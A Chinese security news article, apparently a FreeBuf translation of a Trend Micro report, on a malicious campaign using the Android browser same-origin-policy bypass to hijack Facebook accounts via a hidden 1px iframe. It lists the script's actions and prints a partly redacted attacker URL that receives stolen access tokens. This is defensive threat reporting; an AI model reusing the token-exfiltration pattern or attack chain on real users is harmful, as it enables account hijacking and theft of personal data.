前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >窃取Facebook用户信息:利用Android同源策略漏洞的恶意应用被发现

窃取Facebook用户信息:利用Android同源策略漏洞的恶意应用被发现

作者头像
FB客服
发布2018-02-05 14:58:16
8190
发布2018-02-05 14:58:16
举报
文章被收录于专栏:FreeBuf

几个月前我们曾研究过Android同源策略(SOP)的漏洞,然而最近出现了一款利用此漏洞对Facebook用户进行攻击的恶意应用,其利用代码基于已公开的Metasploit测试代码。

FreeBuf科普:同源策略绕过漏洞

同源策略(SOP)是指客户端脚本(尤其是Javascript)的重要的安全度量标准,是浏览器安全核心基础。它最早出自Nescape Navigator2.0,其目的是防止某个文档或脚本从多个不同源装载。这里的同源指的是同域名、同协议和同端口。

而同源策略绕过发生在A网站(以sitea.com为例)以某种方式访问B网站(以siteb.com为例)的属性如cookie、位置、响应等的时候。由于这个问题的特殊性和可能潜在影响,浏览器对此都有非常严格的管理模式,在现在的浏览器中很少能发现同源策略(SOP)绕过。

相关阅读:Android(4.4版本以下)浏览器同源策略绕过漏洞

攻击过程

攻击是通过向某个特定Facebook网页引用恶意网站的链接来实现的。

此网页包含恶意的Javascript代码:

它会试图在内嵌框架里加载一个Facebook网址:

由于该页面的html内容被div的css设置为不会显示任何内容(display:none),用户只会看到一片空白:

并且该内嵌框架还只有1像素(1px)的大小:

基于以上这些条件,同源策略被绕过。通过构造语句,攻击者从一个能外链的云存储空间加载了一个远程JS代码文件,该文件包含了本次攻击所需要的恶意代码。

该JS代码可以让黑客在Facebook上实现以下行动:

代码语言:javascript
复制
1.添加Facebook好友
2.关注Facebook文章
3.修改订阅项
4.授权Facebook应用访问用户的私密信息(类似于与qq号关联)
5.窃取用户的token并后台上传:http://{BLOCKED}martforchristmas.website/walmart/j/index.php?cid=544fba6ac6988&access_token= $token;
6.收集分析数据(如受害者的位置,HTTP referer等等),在https://whos.{BLOCKED}ung.us/pingjs/上使用合法的服务

除了网站中上述的代码外,我们在http://www.{BLOCKED}php.com/x/toplu.php里发现了相似的攻击痕迹。可以肯定的是,这些都是出自同一攻击者的手笔,因为他们有着同样的函数名,以及相同的Facebook应用client_id。

官方授权未必安全

该恶意软件的client_id为2254487659,这是一个由黑莓官方授权过的应用。我们与黑莓官方确认过,这款应用打着黑莓的认证牌子试图窃取Facebook用户的认证token。有了这个token可以让黑客从Facebook的API读取个人敏感信息,以及发布文章讯息等。

黑莓官方由此发布了以下声明:

代码语言:javascript
复制
“这款恶意软件的攻击对象为Facebook用户,其使用了Android同源策略绕过漏洞,且无视移动设备平台类型。其试图利用黑
莓官方的认证的便利对Facebook WEB应用进行攻击。此次事件并不是黑莓硬件、软件产生了漏洞,与黑莓的网络通信也没有
什么关系。”

Google目前已经修复了这个Android同源策略漏洞。然而不是所有的用户都会去升级浏览器或安卓系统版本。因此除非设备的供应商能发布相应补丁,不然用户仍会处于威胁之中。

[参考来源趋势科技,由FreeBuf小编dawner翻译整理,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)]

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2014-12-29,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
对象存储
对象存储(Cloud Object Storage,COS)是由腾讯云推出的无目录层次结构、无数据格式限制,可容纳海量数据且支持 HTTP/HTTPS 协议访问的分布式存储服务。腾讯云 COS 的存储桶空间无容量上限,无需分区管理,适用于 CDN 数据分发、数据万象处理或大数据计算与分析的数据湖等多种场景。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档